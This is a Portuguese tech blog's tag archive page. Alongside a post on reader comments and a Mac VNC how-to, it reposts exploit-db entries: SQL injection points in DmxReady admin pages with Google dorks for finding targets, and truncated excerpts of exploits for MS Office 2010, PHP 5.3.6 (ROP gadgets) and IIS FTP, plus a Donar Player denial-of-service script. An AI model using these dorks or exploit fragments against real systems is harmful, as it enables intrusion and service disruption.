Browsed by
Tag: windows

A importância dos comentários para um Blogueiro

A importância dos comentários para um Blogueiro

Hoje, saindo um pouco dos universo das dicas e dos how-tos venho falar hoje da importância dos leitores comentarem no BLOG… Um comentário as vezes é um agravante para um decisão por exemplo de continuar ou não um BLOG, sempre que recebo um comentário dizendo que deu certo, salvou minha, meu cachorro não morreu por causa do seu artigo… isso me deixa imensamente satisfeito… com o appunix não é diferente… temos vários leitores que fazem questão de comentar, deixar bem…

Read More Read More

Como conectar no Mac os X Snow leopard | Lion via Remote Desktop

Como conectar no Mac os X Snow leopard | Lion via Remote Desktop

Bom, galera, nós do 4ppun1x conectamos remotamente neste bsd maravilhoso que é o mac afim de que pudéssemos fazer ajustes remotos em nosso pc. Este how to resume-se em habilitar o suporte VNC do mac juntamente com uma senha de segurança para que nosso mac fique tranquilo e seguro para aceitar conexões de rede sem qualquer stress. Estamos usando o mac os x Snow Leopard (mas funciona no mac os x lion), assim como uma conexão comum (feita de um…

Read More Read More

DmxReady Bilboard v1.2 SQL Injection Vulnerability

DmxReady Bilboard v1.2 SQL Injection Vulnerability

# Exploit Title: DmxReady Bilboard v1.2 SQL Injection Vulnerability # Google Dork: inurl:inc_billboardmanager_summary_popup.asp # Date: 03.07.2011 # Author: Bellatrix # Software Link: http://www.dmxready.com/?product=billboard-manager # Version: v1.2 #Language: ASP # Price : $99.97 # Tested on: Windows XP Sp3 # Greetz : VoLqaN , Toprak and All Cyber-Warrior TIM members…. —————————————————————————————————- Bug; http://target/path/admin/BillboardManager/update.asp?ItemID=xx [ SQL ATTACK] Fonte: http://www.exploit-db.com/exploits/17481/

DmxReady Document Library Manager v1.2 SQL Injection Vulnerability

DmxReady Document Library Manager v1.2 SQL Injection Vulnerability

# Exploit Title: DmxReady Document Library Manager v1.2 SQL Injection Vulnerability # Google Dork: inurl:inc_documentlibrarymanager.asp # Date: 03.07.2011 # Author: Bellatrix # Software Link: http://www.dmxready.com/?product=document-library-manager # Version: v1.2 #Language: ASP # Price : $99.97 # Tested on: Windows XP Sp3 # Greetz : VoLqaN , Toprak and All Cyber-Warrior TIM members…. —————————————————————————————————- Bug; http://target/path/admin/DocumentLibraryManager/update.asp?ItemID=xx [ SQL ATTACK] Fonte: http://www.exploit-db.com/exploits/17482/

DMXReady Account List Manager v1.2 SQL Injection Vulnerability

DMXReady Account List Manager v1.2 SQL Injection Vulnerability

# Exploit Title: DMXReady Account List Manager v1.2 SQL Injection Vulnerability # Google Dork: inurl:inc_billboardmanager_summary_popup.asp # Date: 03.07.2011 # Author: Bellatrix # Software Link: http://www.dmxready.com/?product=account-list-manager # Version: v1.2 #Language: ASP # Price : $99.97 #Demo : http://demo.dmxready.com/applications/AccountListManager/inc_accountlistmanager.asp # Tested on: Windows XP Sp3 # Greetz : VoLqaN , Toprak and All Cyber-Warrior TIM members…. ————————————————————————————————— Bug; http://target/path/admin/AccountListManager/update.asp?AccountID=xx [ SQL ATTACK] Fonte: http://www.exploit-db.com/exploits/17483/

DmxReady Links Manager v1.2 SQL Injection Vulnerability

DmxReady Links Manager v1.2 SQL Injection Vulnerability

# Exploit Title: DmxReady Links Manager v1.2 SQL Injection Vulnerability # Google Dork: inurl:inc_linksmanager.asp # Date: 03.07.2011 # Author: Bellatrix # Software Link: http://www.dmxready.com/?product=links-manager # Version: v1.2 #Language: ASP # Price : $99.97 # Tested on: Windows XP Sp3 # Greetz : VoLqaN , Toprak and All Cyber-Warrior TIM members…. ———————————————————————————————————— Bug; http://target/path/admin/LinksManager/update.asp?ItemID=xx [ SQL ATTACK] Fonte: http://www.exploit-db.com/exploits/17484/

MS Office 2010 RTF Header Stack Overflow Vulnerability Exploit

MS Office 2010 RTF Header Stack Overflow Vulnerability Exploit

# Exploit Title: MS Office 2010 RTF Header Stack Overflow Vulnerability Exploit # Date: 7/3/2011 # Author: Snake ( Shahriyar.j < at > gmail ) # Version: MS Office <= 2010 # Tested on: MS Office 2010 ( 14.0.4734.1000) – Windows 7 # CVE : CVE-2010-3333 # This is the exploit I wrote for Abysssec “The Arashi” article. # It gracefully bypass DEP/ASLR in MS Office 2010, # and we named this method “Ikazuchi DEP/ASRL Bypass” : > # unfortunately…

Read More Read More

PHP 5.3.6 Buffer Overflow PoC (ROP) CVE-2011-1938

PHP 5.3.6 Buffer Overflow PoC (ROP) CVE-2011-1938

/* ** Jonathan Salwan – @shell_storm ** http://shell-storm.org ** 2011-06-04 ** ** http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1938 ** ** Stack-based buffer overflow in the socket_connect function in ext/sockets/sockets.c ** in PHP 5.3.3 through 5.3.6 might allow context-dependent attackers to execute arbitrary ** code via a long pathname for a UNIX socket. */ echo “[+] PHP 5.3.6 Buffer Overflow PoC (ROP)\n”; echo “[+] CVE-2011-1938\n\n”; # Gadgets in /usr/bin/php define(‘DUMMY’, “\x42\x42\x42\x42”); // padding define(‘STACK’, “\x20\xba\x74\x08”); // .data 0x46a0 0x874ba20 define(‘STACK4’, “\x24\xba\x74\x08”); // STACK + 4 define(‘STACK8’,…

Read More Read More

Donar Player 2.8.0 Denial of Service Vulnerability

Donar Player 2.8.0 Denial of Service Vulnerability

# ######################################## # Title : Donar Player 2.8.0 Denial of Service # Software link : http://www.donarzone.com/downloads/donar-player-setup-free.exe , http://www.donarzone.com/donar-player # Version : 2.8.0 # Tested on : Windows XP SP3 English # Date : 3/07/2011 # Author : X-h4ck # Website : http://www.pirate.al , # PirateAL Crew @2011 , http://theflashcrew.blogspot.com # Email : mem001@live.com # Greetz : Wulns~ – IllyrianWarrior – Danzel – Ace – M4yh3m – Saldeath – bi0 – Slimshaddy – d3trimentaL – Lekosta # ######################################## #!/usr/bin/python filename =…

Read More Read More

Microsoft IIS FTP Server <= 7.0 Stack Exhaustion DoS [MS09-053]

Microsoft IIS FTP Server <= 7.0 Stack Exhaustion DoS [MS09-053]

# Exploit Title: [MS09-053] Microsoft IIS FTP Server <= 7.0 Stack Exhaustion DoS # Date: Jul 03, 2011 # Author: Myo Soe # Software Link: http://www.microsoft.com/ # Version: 5.0 – 7.0 # Tested on: unpatched version of windows xp & 2k3 ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/…

Read More Read More